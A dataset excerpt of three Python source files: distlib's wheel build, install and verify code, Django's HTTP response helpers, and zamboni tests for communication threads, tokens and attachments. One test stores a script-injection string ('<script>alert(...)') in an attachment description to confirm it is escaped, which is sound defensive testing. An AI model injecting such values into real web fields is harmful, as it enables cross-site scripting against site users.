                # comment out next suite to leave .pyc files in
                if fsdecode(fn).endswith(('.pyc', '.pyo')):
                    continue
                p = os.path.join(root, fn)
                rp = to_posix(os.path.relpath(p, path))
                archive_paths.append((rp, p))
        # Now distinfo. Assumed to be flat, i.e. os.listdir is enough.
        files = os.listdir(distinfo)
        for fn in files:
            # RECORD/INSTALLER/SHARED/WHEEL are generated, not copied.
            if fn not in ('RECORD', 'INSTALLER', 'SHARED', 'WHEEL'):
                p = fsdecode(os.path.join(distinfo, fn))
                ap = to_posix(os.path.join(info_dir, fn))
                archive_paths.append((ap, p))
        wheel_metadata = [
            'Wheel-Version: %d.%d' % (wheel_version or self.wheel_version),
            'Generator: distlib %s' % __version__,
            'Root-Is-Purelib: %s' % is_pure,
        ]
        for pyver, abi, arch in self.tags:
            wheel_metadata.append('Tag: %s-%s-%s' % (pyver, abi, arch))
        p = os.path.join(distinfo, 'WHEEL')
        with open(p, 'w') as f:
            f.write('\n'.join(wheel_metadata))
        ap = to_posix(os.path.join(info_dir, 'WHEEL'))
        archive_paths.append((ap, p))
        # Now, at last, RECORD.
        # Paths in here are archive paths - nothing else makes sense.
        self.write_records((distinfo, info_dir), libdir, archive_paths)
        # Now, ready to build the zip file
        pathname = os.path.join(self.dirname, self.filename)
        self.build_zip(pathname, archive_paths)
        return pathname
    def install(self, paths, maker, **kwargs):
        """
        Install a wheel to the specified paths. If kwarg ``warner`` is
        specified, it should be a callable, which will be called with two
        tuples indicating the wheel version of this software and the wheel
        version in the file, if there is a discrepancy in the versions.
        This can be used to issue any warnings or to raise any exceptions.
        If kwarg ``lib_only`` is True, only the purelib/platlib files are
        installed, and the headers, scripts, data and dist-info metadata are
        not written.
        The return value is a :class:`InstalledDistribution` instance unless
        ``options.lib_only`` is True, in which case the return value is ``None``.
        """
        dry_run = maker.dry_run
        warner = kwargs.get('warner')
        lib_only = kwargs.get('lib_only', False)
        pathname = os.path.join(self.dirname, self.filename)
        name_ver = '%s-%s' % (self.name, self.version)
        data_dir = '%s.data' % name_ver
        info_dir = '%s.dist-info' % name_ver
        metadata_name = posixpath.join(info_dir, METADATA_FILENAME)
        wheel_metadata_name = posixpath.join(info_dir, 'WHEEL')
        record_name = posixpath.join(info_dir, 'RECORD')
        wrapper = codecs.getreader('utf-8')
        with ZipFile(pathname, 'r') as zf:
            with zf.open(wheel_metadata_name) as bwf:
                wf = wrapper(bwf)
                message = message_from_file(wf)
            wv = message['Wheel-Version'].split('.', 1)
            file_version = tuple([int(i) for i in wv])
            if (file_version != self.wheel_version) and warner:
                warner(self.wheel_version, file_version)
            if message['Root-Is-Purelib'] == 'true':
                libdir = paths['purelib']
            else:
                libdir = paths['platlib']
            # Map archive path -> RECORD row, used below to verify each
            # member's size and digest before installation.
            records = {}
            with zf.open(record_name) as bf:
                with CSVReader(stream=bf) as reader:
                    for row in reader:
                        p = row[0]
                        records[p] = row
            data_pfx = posixpath.join(data_dir, '')
            info_pfx = posixpath.join(info_dir, '')
            script_pfx = posixpath.join(data_dir, 'scripts', '')
            # make a new instance rather than a copy of maker's,
            # as we mutate it
            fileop = FileOperator(dry_run=dry_run)
            fileop.record = True    # so we can rollback if needed
            bc = not sys.dont_write_bytecode    # Double negatives. Lovely!
            outfiles = []   # for RECORD writing
            # for script copying/shebang processing
            workdir = tempfile.mkdtemp()
            # set target dir later
            # we default add_launchers to False, as the
            # Python Launcher should be used instead
            maker.source_dir = workdir
            maker.target_dir = None
            try:
                for zinfo in zf.infolist():
                    arcname = zinfo.filename
                    if isinstance(arcname, text_type):
                        u_arcname = arcname
                    else:
                        u_arcname = arcname.decode('utf-8')
                    # The signature file won't be in RECORD,
                    # and we don't currently do anything with it
                    if u_arcname.endswith('/RECORD.jws'):
                        continue
                    row = records[u_arcname]
                    if row[2] and str(zinfo.file_size) != row[2]:
                        raise DistlibException('size mismatch for '
                                               '%s' % u_arcname)
                    if row[1]:
                        kind, value = row[1].split('=', 1)
                        with zf.open(arcname) as bf:
                            data = bf.read()
                        _, digest = self.get_hash(data, kind)
                        if digest != value:
                            raise DistlibException('digest mismatch for '
                                                   '%s' % arcname)
                    if lib_only and u_arcname.startswith((info_pfx, data_pfx)):
                        logger.debug('lib_only: skipping %s', u_arcname)
                        continue
                    is_script = (u_arcname.startswith(script_pfx)
                                 and not u_arcname.endswith('.exe'))
                    if u_arcname.startswith(data_pfx):
                        # '.data/<where>/<relpath>' -> install to paths[where]
                        _, where, rp = u_arcname.split('/', 2)
                        outfile = os.path.join(paths[where], convert_path(rp))
                    else:
                        # meant for site-packages.
                        if u_arcname in (wheel_metadata_name, record_name):
                            continue
                        outfile = os.path.join(libdir, convert_path(u_arcname))
                    if not is_script:
                        with zf.open(arcname) as bf:
                            fileop.copy_stream(bf, outfile)
                        outfiles.append(outfile)
                        # Double check the digest of the written file
                        if not dry_run and row[1]:
                            with open(outfile, 'rb') as bf:
                                data = bf.read()
                                _, newdigest = self.get_hash(data, kind)
                                if newdigest != digest:
                                    raise DistlibException('digest mismatch '
                                                           'on write for '
                                                           '%s' % outfile)
                        if bc and outfile.endswith('.py'):
                            try:
                                pyc = fileop.byte_compile(outfile)
                                outfiles.append(pyc)
                            except Exception:
                                # Don't give up if byte-compilation fails,
                                # but log it and perhaps warn the user
                                logger.warning('Byte-compilation failed',
                                               exc_info=True)
                    else:
                        # Scripts are extracted to a temp dir, then
                        # regenerated by the maker (shebang rewriting etc.).
                        fn = os.path.basename(convert_path(arcname))
                        workname = os.path.join(workdir, fn)
                        with zf.open(arcname) as bf:
                            fileop.copy_stream(bf, workname)
                        dn, fn = os.path.split(outfile)
                        maker.target_dir = dn
                        filenames = maker.make(fn)
                        fileop.set_executable_mode(filenames)
                        outfiles.extend(filenames)
                if lib_only:
                    logger.debug('lib_only: returning None')
                    dist = None
                else:
                    # Generate scripts
                    # Try to get pydist.json so we can see if there are
                    # any commands to generate. If this fails (e.g. because
                    # of a legacy wheel), log a warning but don't give up.
                    commands = None
                    file_version = self.info['Wheel-Version']
                    if file_version == '1.0':
                        # Use legacy info
                        ep = posixpath.join(info_dir, 'entry_points.txt')
                        try:
                            with zf.open(ep) as bwf:
                                epdata = read_exports(bwf)
                            commands = {}
                            for key in ('console', 'gui'):
                                k = '%s_scripts' % key
                                if k in epdata:
                                    commands['wrap_%s' % key] = d = {}
                                    for v in epdata[k].values():
                                        s = '%s:%s' % (v.prefix, v.suffix)
                                        if v.flags:
                                            s += ' %s' % v.flags
                                        d[v.name] = s
                        except Exception:
                            logger.warning('Unable to read legacy script '
                                           'metadata, so cannot generate '
                                           'scripts')
                    else:
                        try:
                            with zf.open(metadata_name) as bwf:
                                wf = wrapper(bwf)
                                commands = json.load(wf).get('extensions')
                                if commands:
                                    commands = commands.get('python.commands')
                        except Exception:
                            logger.warning('Unable to read JSON metadata, so '
                                           'cannot generate scripts')
                    if commands:
                        console_scripts = commands.get('wrap_console', {})
                        gui_scripts = commands.get('wrap_gui', {})
                        if console_scripts or gui_scripts:
                            script_dir = paths.get('scripts', '')
                            if not os.path.isdir(script_dir):
                                raise ValueError('Valid script path not '
                                                 'specified')
                            maker.target_dir = script_dir
                            for k, v in console_scripts.items():
                                script = '%s = %s' % (k, v)
                                filenames = maker.make(script)
                                fileop.set_executable_mode(filenames)
                            if gui_scripts:
                                options = {'gui': True }
                                for k, v in gui_scripts.items():
                                    script = '%s = %s' % (k, v)
                                    filenames = maker.make(script, options)
                                    fileop.set_executable_mode(filenames)
                    p = os.path.join(libdir, info_dir)
                    dist = InstalledDistribution(p)
                    # Write SHARED
                    paths = dict(paths) # don't change passed in dict
                    del paths['purelib']
                    del paths['platlib']
                    paths['lib'] = libdir
                    p = dist.write_shared_locations(paths, dry_run)
                    if p:
                        outfiles.append(p)
                    # Write RECORD
                    dist.write_installed_files(outfiles, paths['prefix'],
                                               dry_run)
                return dist
            except Exception:  # pragma: no cover
                logger.exception('installation failed.')
                fileop.rollback()
                raise
            finally:
                shutil.rmtree(workdir)
    def _get_dylib_cache(self):
        """
        Return (creating on first use) the module-level Cache used for
        extracting native extension libraries from mounted wheels.
        """
        global cache
        if cache is None:
            # Use native string to avoid issues on 2.x: see Python #20140.
            base = os.path.join(get_cache_base(), str('dylib-cache'),
                                sys.version[:3])
            cache = Cache(base)
        return cache
    def _get_extensions(self):
        """
        Extract any C extensions listed in the wheel's EXTENSIONS file
        into the dylib cache and return (name, extracted-path) pairs.
        Extraction is skipped when the cached copy is newer than the
        archive member. Returns [] if the wheel has no EXTENSIONS file.
        """
        pathname = os.path.join(self.dirname, self.filename)
        name_ver = '%s-%s' % (self.name, self.version)
        info_dir = '%s.dist-info' % name_ver
        arcname = posixpath.join(info_dir, 'EXTENSIONS')
        wrapper = codecs.getreader('utf-8')
        result = []
        with ZipFile(pathname, 'r') as zf:
            try:
                with zf.open(arcname) as bf:
                    wf = wrapper(bf)
                    extensions = json.load(wf)
                    cache = self._get_dylib_cache()
                    prefix = cache.prefix_to_dir(pathname)
                    cache_base = os.path.join(cache.base, prefix)
                    if not os.path.isdir(cache_base):
                        os.makedirs(cache_base)
                    for name, relpath in extensions.items():
                        dest = os.path.join(cache_base, convert_path(relpath))
                        if not os.path.exists(dest):
                            extract = True
                        else:
                            # Re-extract only if the archive member is
                            # newer than the cached file.
                            file_time = os.stat(dest).st_mtime
                            file_time = datetime.datetime.fromtimestamp(file_time)
                            info = zf.getinfo(relpath)
                            wheel_time = datetime.datetime(*info.date_time)
                            extract = wheel_time > file_time
                        if extract:
                            zf.extract(relpath, cache_base)
                        result.append((name, dest))
            except KeyError:
                # No EXTENSIONS member in the archive: pure wheel.
                pass
        return result
    def is_compatible(self):
        """
        Determine if a wheel is compatible with the running system.
        """
        # Delegates to the module-level is_compatible() helper.
        return is_compatible(self)
    def is_mountable(self):
        """
        Determine if a wheel is asserted as mountable by its metadata.
        """
        return True # for now - metadata details TBD
    def mount(self, append=False):
        """
        Make the wheel importable by adding it to sys.path (at the front,
        or at the end if *append* is True) and registering any C
        extensions it contains with the module-level import hook.
        """
        pathname = os.path.abspath(os.path.join(self.dirname, self.filename))
        if not self.is_compatible():
            msg = 'Wheel %s not compatible with this Python.' % pathname
            raise DistlibException(msg)
        if not self.is_mountable():
            msg = 'Wheel %s is marked as not mountable.' % pathname
            raise DistlibException(msg)
        if pathname in sys.path:
            logger.debug('%s already in path', pathname)
        else:
            if append:
                sys.path.append(pathname)
            else:
                sys.path.insert(0, pathname)
            extensions = self._get_extensions()
            if extensions:
                # Install the meta-path hook once, then register this
                # wheel's extensions with it.
                if _hook not in sys.meta_path:
                    sys.meta_path.append(_hook)
                _hook.add(pathname, extensions)
    def unmount(self):
        """
        Reverse mount(): remove the wheel from sys.path and unregister
        its extensions, dropping the import hook when no mounted wheel
        needs it any more.
        """
        pathname = os.path.abspath(os.path.join(self.dirname, self.filename))
        if pathname not in sys.path:
            logger.debug('%s not in path', pathname)
        else:
            sys.path.remove(pathname)
            if pathname in _hook.impure_wheels:
                _hook.remove(pathname)
            if not _hook.impure_wheels:
                if _hook in sys.meta_path:
                    sys.meta_path.remove(_hook)
    def verify(self):
        """
        Check every archive member against its RECORD entry (size and
        digest) and reject suspicious paths; raises DistlibException on
        any mismatch. Wheel-Version compatibility is not yet checked.
        """
        pathname = os.path.join(self.dirname, self.filename)
        name_ver = '%s-%s' % (self.name, self.version)
        data_dir = '%s.data' % name_ver
        info_dir = '%s.dist-info' % name_ver
        metadata_name = posixpath.join(info_dir, METADATA_FILENAME)
        wheel_metadata_name = posixpath.join(info_dir, 'WHEEL')
        record_name = posixpath.join(info_dir, 'RECORD')
        wrapper = codecs.getreader('utf-8')
        with ZipFile(pathname, 'r') as zf:
            with zf.open(wheel_metadata_name) as bwf:
                wf = wrapper(bwf)
                message = message_from_file(wf)
            wv = message['Wheel-Version'].split('.', 1)
            file_version = tuple([int(i) for i in wv])
            # TODO version verification
            records = {}
            with zf.open(record_name) as bf:
                with CSVReader(stream=bf) as reader:
                    for row in reader:
                        p = row[0]
                        records[p] = row
            for zinfo in zf.infolist():
                arcname = zinfo.filename
                if isinstance(arcname, text_type):
                    u_arcname = arcname
                else:
                    u_arcname = arcname.decode('utf-8')
                # Reject path traversal attempts in archive names.
                if '..' in u_arcname:
                    raise DistlibException('invalid entry in '
                                           'wheel: %r' % u_arcname)
                # The signature file won't be in RECORD,
                # and we don't currently do anything with it
                if u_arcname.endswith('/RECORD.jws'):
                    continue
                row = records[u_arcname]
                if row[2] and str(zinfo.file_size) != row[2]:
                    raise DistlibException('size mismatch for '
                                           '%s' % u_arcname)
                if row[1]:
                    kind, value = row[1].split('=', 1)
                    with zf.open(arcname) as bf:
                        data = bf.read()
                    _, digest = self.get_hash(data, kind)
                    if digest != value:
                        raise DistlibException('digest mismatch for '
                                               '%s' % arcname)
    def update(self, modifier, dest_dir=None, **kwargs):
        """
        Update the contents of a wheel in a generic way. The modifier should
        be a callable which expects a dictionary argument: its keys are
        archive-entry paths, and its values are absolute filesystem paths
        where the contents the corresponding archive entries can be found. The
        modifier is free to change the contents of the files pointed to, add
        new entries and remove entries, before returning. This method will
        extract the entire contents of the wheel to a temporary location, call
        the modifier, and then use the passed (and possibly updated)
        dictionary to write a new wheel. If ``dest_dir`` is specified, the new
        wheel is written there -- otherwise, the original wheel is overwritten.
        The modifier should return True if it updated the wheel, else False.
        This method returns the same value the modifier returns.
        """
        def get_version(path_map, info_dir):
            # Return (version, metadata-path) from the extracted files,
            # preferring the JSON metadata and falling back to PKG-INFO.
            version = path = None
            key = '%s/%s' % (info_dir, METADATA_FILENAME)
            if key not in path_map:
                key = '%s/PKG-INFO' % info_dir
            if key in path_map:
                path = path_map[key]
                version = Metadata(path=path).version
            return version, path
        def update_version(version, path):
            # Bump the version with a local-version suffix ('+1', or
            # increment an existing '+x.y' suffix) so the rebuilt wheel
            # is distinguishable from the original.
            updated = None
            try:
                # Parsed purely for validation; raises if non-compliant.
                v = NormalizedVersion(version)
                i = version.find('-')
                if i < 0:
                    updated = '%s+1' % version
                else:
                    parts = [int(s) for s in version[i + 1:].split('.')]
                    parts[-1] += 1
                    updated = '%s+%s' % (version[:i],
                                         '.'.join(str(i) for i in parts))
            except UnsupportedVersionError:
                logger.debug('Cannot update non-compliant (PEP-440) '
                             'version %r', version)
            if updated:
                md = Metadata(path=path)
                md.version = updated
                legacy = not path.endswith(METADATA_FILENAME)
                md.write(path=path, legacy=legacy)
                logger.debug('Version updated from %r to %r', version,
                             updated)
        pathname = os.path.join(self.dirname, self.filename)
        name_ver = '%s-%s' % (self.name, self.version)
        info_dir = '%s.dist-info' % name_ver
        record_name = posixpath.join(info_dir, 'RECORD')
        with tempdir() as workdir:
            with ZipFile(pathname, 'r') as zf:
                path_map = {}
                for zinfo in zf.infolist():
                    arcname = zinfo.filename
                    if isinstance(arcname, text_type):
                        u_arcname = arcname
                    else:
                        u_arcname = arcname.decode('utf-8')
                    # RECORD is regenerated, so don't extract/map it.
                    if u_arcname == record_name:
                        continue
                    if '..' in u_arcname:
                        raise DistlibException('invalid entry in '
                                               'wheel: %r' % u_arcname)
                    zf.extract(zinfo, workdir)
                    path = os.path.join(workdir, convert_path(u_arcname))
                    path_map[u_arcname] = path
            # Remember the version.
            original_version, _ = get_version(path_map, info_dir)
            # Files extracted. Call the modifier.
            modified = modifier(path_map, **kwargs)
            if modified:
                # Something changed - need to build a new wheel.
                current_version, path = get_version(path_map, info_dir)
                if current_version and (current_version == original_version):
                    # Add or update local version to signify changes.
                    update_version(current_version, path)
                # Decide where the new wheel goes.
                if dest_dir is None:
                    fd, newpath = tempfile.mkstemp(suffix='.whl',
                                                   prefix='wheel-update-',
                                                   dir=workdir)
                    os.close(fd)
                else:
                    if not os.path.isdir(dest_dir):
                        raise DistlibException('Not a directory: %r' % dest_dir)
                    newpath = os.path.join(dest_dir, self.filename)
                archive_paths = list(path_map.items())
                distinfo = os.path.join(workdir, info_dir)
                info = distinfo, info_dir
                self.write_records(info, workdir, archive_paths)
                self.build_zip(newpath, archive_paths)
                if dest_dir is None:
                    shutil.copyfile(newpath, pathname)
        return modified
def compatible_tags():
    """
    Return (pyver, abi, arch) tuples compatible with this Python.

    Tags are ordered most- to least-specific: implementation+ABI+arch
    first, then implementation-generic and pure-Python ('py') tags.
    """
    versions = [VER_SUFFIX]
    major = VER_SUFFIX[0]
    for minor in range(sys.version_info[1] - 1, - 1, -1):
        versions.append(''.join([major, str(minor)]))
    abis = []
    for suffix, _, _ in imp.get_suffixes():
        if suffix.startswith('.abi'):
            abis.append(suffix.split('.', 2)[1])
    abis.sort()
    if ABI != 'none':
        abis.insert(0, ABI)
    abis.append('none')
    result = []
    arches = [ARCH]
    if sys.platform == 'darwin':
        # Raw string: '\w'/'\d' are invalid escape sequences in a plain
        # string literal and raise warnings/errors on modern Pythons.
        m = re.match(r'(\w+)_(\d+)_(\d+)_(\w+)$', ARCH)
        if m:
            # Local names prefixed to avoid shadowing 'major' above.
            name, mac_major, mac_minor, mac_arch = m.groups()
            mac_minor = int(mac_minor)
            matches = [mac_arch]
            if mac_arch in ('i386', 'ppc'):
                matches.append('fat')
            if mac_arch in ('i386', 'ppc', 'x86_64'):
                matches.append('fat3')
            if mac_arch in ('ppc64', 'x86_64'):
                matches.append('fat64')
            if mac_arch in ('i386', 'x86_64'):
                matches.append('intel')
            if mac_arch in ('i386', 'x86_64', 'intel', 'ppc', 'ppc64'):
                matches.append('universal')
            # Each older OS X minor release is also compatible.
            while mac_minor >= 0:
                for match in matches:
                    s = '%s_%s_%s_%s' % (name, mac_major, mac_minor, match)
                    if s != ARCH:   # already there
                        arches.append(s)
                mac_minor -= 1
    # Most specific - our Python version, ABI and arch
    for abi in abis:
        for arch in arches:
            result.append((''.join((IMP_PREFIX, versions[0])), abi, arch))
    # where no ABI / arch dependency, but IMP_PREFIX dependency
    for i, version in enumerate(versions):
        result.append((''.join((IMP_PREFIX, version)), 'none', 'any'))
        if i == 0:
            result.append((''.join((IMP_PREFIX, version[0])), 'none', 'any'))
    # no IMP_PREFIX, ABI or arch dependency
    for i, version in enumerate(versions):
        result.append((''.join(('py', version)), 'none', 'any'))
        if i == 0:
            result.append((''.join(('py', version[0])), 'none', 'any'))
    return set(result)
COMPATIBLE_TAGS = compatible_tags()
del compatible_tags
def is_compatible(wheel, tags=None):
    """
    Return True if *wheel* (a Wheel instance or a wheel filename)
    matches any of the (pyver, abi, arch) *tags* — by default, the
    tags compatible with the running interpreter.
    """
    if not isinstance(wheel, Wheel):
        wheel = Wheel(wheel)    # assume it's a filename
    if tags is None:
        tags = COMPATIBLE_TAGS
    return any(ver in wheel.pyver and abi in wheel.abi and arch in wheel.arch
               for ver, abi, arch in tags)
| mit |
joebowen/movement_validation_cloud | djangodev/lib/python2.7/site-packages/django/http/utils.py | 134 | 1501 | """
Functions that modify an HTTP request or response in some way.
"""
# This group of functions are run as part of the response handling, after
# everything else, including all response middleware. Think of them as
# "compulsory response middleware". Be careful about what goes here, because
# it's a little fiddly to override this behavior, so they should be truly
# universally applicable.
def fix_location_header(request, response):
    """
    Ensures that we always use an absolute URI in any location header in the
    response. This is required by RFC 2616, section 14.30.

    Code constructing response objects is free to insert relative paths, as
    this function converts them to absolute paths.
    """
    has_location = 'Location' in response
    if has_location and request.get_host():
        absolute = request.build_absolute_uri(response['Location'])
        response['Location'] = absolute
    return response
def conditional_content_removal(request, response):
    """
    Removes the content of responses for HEAD requests, 1xx, 204 and 304
    responses. Ensures compliance with RFC 2616, section 4.3.
    """
    def _clear_body():
        # Streaming responses drop their iterator; regular ones their bytes.
        if response.streaming:
            response.streaming_content = []
        else:
            response.content = b''
    code = response.status_code
    if 100 <= code < 200 or code in (204, 304):
        _clear_body()
        response['Content-Length'] = '0'
    if request.method == 'HEAD':
        _clear_body()
    return response
| mit |
mozilla/zamboni | mkt/comm/tests/test_models.py | 6 | 14567 | from datetime import datetime
from os import path
from django.core.exceptions import ValidationError
from django.core.urlresolvers import NoReverseMatch
from django.test.utils import override_settings
import mock
from nose.tools import eq_, ok_
import mkt
from mkt.comm.models import (CommAttachment, CommunicationNote,
CommunicationThread, CommunicationThreadCC,
CommunicationThreadToken, user_has_perm_app,
user_has_perm_note, user_has_perm_thread)
from mkt.comm.tests.test_views import CommTestMixin
from mkt.constants import comm as const
from mkt.site.fixtures import fixture
from mkt.site.tests import (TestCase, app_factory, extension_factory,
user_factory)
from mkt.webapps.models import Webapp
from mkt.users.models import UserProfile
TESTS_DIR = path.dirname(path.abspath(__file__))
ATTACHMENTS_DIR = path.join(TESTS_DIR, 'attachments')
class PermissionTestMixin(object):
    """
    Shared permission tests for comm threads and notes.

    Subclasses set ``self.type`` ('note' or 'thread') and ``self.obj``
    (the object whose read permissions are exercised) in their setUp.
    """
    fixtures = fixture('user_999', 'webapp_337141')
    def setUp(self):
        self.addon = Webapp.objects.get()
        self.version = self.addon.current_version
        self.user = UserProfile.objects.get(email='regular@mozilla.com')
        self.thread = CommunicationThread.objects.create(
            _addon=self.addon, _version=self.version)
        self.author = user_factory(email='lol')
        self.note = CommunicationNote.objects.create(
            thread=self.thread, author=self.author, note_type=0, body='xyz')
        # Subclasses assign the object under test here.
        self.obj = None
    def _eq_obj_perm(self, val):
        # Assert the user's read permission on self.obj equals *val*.
        if self.type == 'note':
            eq_(user_has_perm_note(self.obj, self.user), val)
        else:
            eq_(user_has_perm_thread(self.obj, self.user), val)
    def test_no_perm(self):
        self._eq_obj_perm(False)
    def test_has_perm_public(self):
        self.obj.update(read_permission_public=True)
        self._eq_obj_perm(True)
    def test_has_perm_dev(self):
        self.obj.update(read_permission_developer=True)
        self.addon.addonuser_set.create(user=self.user)
        self._eq_obj_perm(True)
    def test_has_perm_rev_addons(self):
        self.obj.update(read_permission_reviewer=True)
        self.grant_permission(self.user, 'Apps:Review')
        self._eq_obj_perm(True)
    def test_has_perm_rev_ext(self):
        self.obj.update(read_permission_reviewer=True)
        self.grant_permission(self.user, 'ContentTools:AddonReview')
        self._eq_obj_perm(True)
    def test_has_perm_senior_rev(self):
        self.obj.update(read_permission_senior_reviewer=True)
        self.grant_permission(self.user, 'Apps:ReviewEscalated')
        self._eq_obj_perm(True)
    def test_has_perm_moz_contact(self):
        self.obj.update(read_permission_mozilla_contact=True)
        self.addon.update(
            mozilla_contact=','.join([self.user.email, 'lol@lol.com']))
        self._eq_obj_perm(True)
    def test_has_perm_staff(self):
        self.obj.update(read_permission_staff=True)
        self.grant_permission(self.user, 'Admin:*')
        self._eq_obj_perm(True)
class TestCommunicationNote(PermissionTestMixin, TestCase):
    """Note-specific permission tests plus manager filtering."""
    def setUp(self):
        super(TestCommunicationNote, self).setUp()
        # Run the mixin's permission assertions against the note.
        self.type = 'note'
        self.obj = self.note
    def test_has_perm_author(self):
        self.obj.update(author=self.user)
        self._eq_obj_perm(True)
    def test_has_perm_no_author(self):
        self.obj.update(author=None)
        self._eq_obj_perm(False)
    def test_manager(self):
        # with_perms() should only surface notes the user may read.
        eq_(CommunicationNote.objects.count(), 1)
        eq_(CommunicationNote.objects.with_perms(self.user,
                                                 self.thread).count(), 0)
        self.note.update(author=self.user)
        eq_(CommunicationNote.objects.with_perms(self.user,
                                                 self.thread).count(), 1)
class TestCommunicationThread(PermissionTestMixin, TestCase):
    """Thread-specific permission tests and model validation."""
    def setUp(self):
        super(TestCommunicationThread, self).setUp()
        # Run the mixin's permission assertions against the thread.
        self.type = 'thread'
        self.obj = self.thread
    def test_addon_deleted(self):
        # The thread still resolves its app even after deletion.
        self.thread.obj.update(status=mkt.STATUS_DELETED)
        eq_(self.thread.obj, self.addon)
    def test_version_deleted(self):
        # The thread still resolves its version even after deletion.
        self.version.update(deleted=True)
        eq_(self.thread.version, self.version)
    def test_has_perm_posted(self):
        self.note.update(author=self.user)
        self._eq_obj_perm(True)
    def test_has_perm_cc(self):
        CommunicationThreadCC.objects.create(user=self.user, thread=self.obj)
        self._eq_obj_perm(True)
    def test_has_perm_app_reviewer(self):
        ok_(not user_has_perm_app(self.user, self.addon))
        self.grant_permission(self.user, 'Apps:Review')
        ok_(user_has_perm_app(self.user, self.addon))
    def test_has_perm_app_developer(self):
        ok_(not user_has_perm_app(self.user, self.addon))
        self.addon.addonuser_set.create(user=self.user)
        ok_(user_has_perm_app(self.user, self.addon))
    def test_clean(self):
        with self.assertRaises(ValidationError):
            # Need app.
            CommunicationThread.objects.create().clean()
        with self.assertRaises(ValidationError):
            # Need version.
            CommunicationThread.objects.create(_addon=self.addon).clean()
class TestCommunicationThreadExtension(TestCase):
    """Threads attached to an extension rather than an app/webapp."""
    fixtures = fixture('user_999',)

    def setUp(self):
        self.extension = extension_factory()
        self.version = self.extension.latest_version
        self.user = UserProfile.objects.get(email='regular@mozilla.com')
        # Extension threads use the _extension/_extension_version FKs
        # instead of _addon/_version.
        self.thread = CommunicationThread.objects.create(
            _extension=self.extension, _extension_version=self.version)
        self.author = user_factory(email='lol')
        self.note = CommunicationNote.objects.create(
            thread=self.thread, author=self.author, note_type=0, body='xyz')

    def test_fields(self):
        """Extension threads leave the app/version FKs unset."""
        ok_(not self.thread._addon)
        ok_(not self.thread._version)

    def test_obj(self):
        """obj resolves to the extension."""
        eq_(self.thread.obj, self.extension)

    def test_version(self):
        """version resolves to the extension version."""
        eq_(self.thread.version, self.version)

    def test_clean(self):
        """clean() requires an extension version alongside the extension."""
        with self.assertRaises(ValidationError):
            # Need extension version.
            CommunicationThread.objects.create(
                _extension=self.extension).clean()
class TestThreadTokenModel(TestCase):
    """Validity and UUID-reset behaviour of CommunicationThreadToken."""
    fixtures = fixture('user_999', 'webapp_337141')

    def setUp(self):
        addon = Webapp.objects.get(pk=337141)
        self.thread = CommunicationThread(_addon=addon)
        user = UserProfile.objects.all()[0]
        # Build an unsaved token with a fresh timestamp and no uses, so
        # each test starts from a valid token.
        self.token = CommunicationThreadToken(thread=self.thread, user=user)
        self.token.modified = datetime.now()
        self.token.use_count = 0

    def test_live_thread_token_is_valid(self):
        """
        Test `is_valid()` when the token is fresh (not expired).
        """
        assert self.token.is_valid()

    def test_expired_thread_token_is_valid(self):
        """
        Test `is_valid()` when the token has passed THREAD_TOKEN_EXPIRY.
        """
        self.token.modified = self.days_ago(const.THREAD_TOKEN_EXPIRY + 1)
        assert not self.token.is_valid()

    def test_unused_token_is_valid(self):
        """
        Test `is_valid()` when the token is unused.
        """
        assert self.token.is_valid()

    def test_max_used_thread_token_is_valid(self):
        """
        Test `is_valid()` when the token has reached MAX_TOKEN_USE_COUNT.
        """
        self.token.use_count = const.MAX_TOKEN_USE_COUNT
        assert not self.token.is_valid()

    def test_reset_uuid(self):
        """
        Test `reset_uuid()` generates a different uuid.
        """
        self.thread.save()
        self.token.thread = self.thread
        self.token.save()
        uuid = self.token.uuid
        assert uuid
        self.token.reset_uuid()
        assert self.token.uuid
        assert uuid != self.token.uuid
class TestCommAttachment(TestCase, CommTestMixin):
    """File naming, path building, escaping and image detection for
    CommAttachment."""
    fixtures = fixture('webapp_337141')
    # Deliberately hostile description used to verify output escaping.
    XSS_STRING = 'MMM <script>alert(bacon);</script>'

    def setUp(self):
        self.user = user_factory(email='porkbelly')
        mkt.set_user(self.user)
        self.profile = self.user
        self.addon = Webapp.objects.get()
        self.version = self.addon.latest_version
        self.thread = self._thread_factory()
        self.note = self._note_factory(self.thread)
        self.attachment1, self.attachment2 = self._attachments(self.note)

    def _attachments(self, note):
        """
        Create and return a tuple of CommAttachment instances: a plain
        text attachment and an image whose description is XSS_STRING.
        """
        ala1 = CommAttachment.objects.create(note=note,
                                             filepath='bacon.txt',
                                             mimetype='text/plain')
        ala2 = CommAttachment.objects.create(note=note,
                                             filepath='bacon.jpg',
                                             description=self.XSS_STRING,
                                             mimetype='image/jpeg')
        return ala1, ala2

    def test_filename(self):
        msg = 'CommAttachment().filename() returning incorrect filename.'
        eq_(self.attachment1.filename(), 'bacon.txt', msg)
        eq_(self.attachment2.filename(), 'bacon.jpg', msg)

    def test_full_path_dirname(self):
        msg = 'CommAttachment().full_path() returning incorrect path.'
        FAKE_PATH = '/tmp/attachments/'
        with self.settings(REVIEWER_ATTACHMENTS_PATH=FAKE_PATH):
            eq_(self.attachment1.full_path(), FAKE_PATH + 'bacon.txt', msg)
            eq_(self.attachment2.full_path(), FAKE_PATH + 'bacon.jpg', msg)

    def test_display_name(self):
        msg = ('CommAttachment().display_name() returning '
               'incorrect display name.')
        eq_(self.attachment1.display_name(), 'bacon.txt', msg)

    def test_display_name_xss(self):
        # The raw XSS description must come back escaped/stripped.
        ok_('<script>' not in self.attachment2.display_name())

    @override_settings(REVIEWER_ATTACHMENTS_PATH=ATTACHMENTS_DIR)
    def test_is_image(self):
        msg = 'CommAttachment().is_image() not correctly detecting images.'
        eq_(self.attachment1.is_image(), False, msg)
        eq_(self.attachment2.is_image(), True, msg)

    def test_get_absolute_url(self):
        # Only checks the URL reverses; the value itself is not asserted.
        try:
            self.attachment1.get_absolute_url()
            self.attachment2.get_absolute_url()
        except NoReverseMatch:
            assert False, 'CommAttachment.get_absolute_url NoReverseMatch'
class TestUserHasPermNoteExtensions(TestCase):
    """user_has_perm_note() visibility rules for extension threads."""

    def setUp(self):
        super(TestUserHasPermNoteExtensions, self).setUp()
        self.extension = extension_factory()
        self.developer = user_factory()
        self.developer.extension_set.add(self.extension)
        self.reviewer = user_factory()
        # Fix: the rule string was 'ContentTools: AddonReview' (stray space
        # after the colon), which does not match the 'Type:Rule' form used
        # everywhere else (cf. 'ContentTools:AddonReview' in the permission
        # tests above), so the grant was ineffective.
        self.grant_permission(self.reviewer, 'ContentTools:AddonReview')
        self.thread = CommunicationThread.objects.create(
            _extension=self.extension,
            _extension_version=self.extension.latest_version)

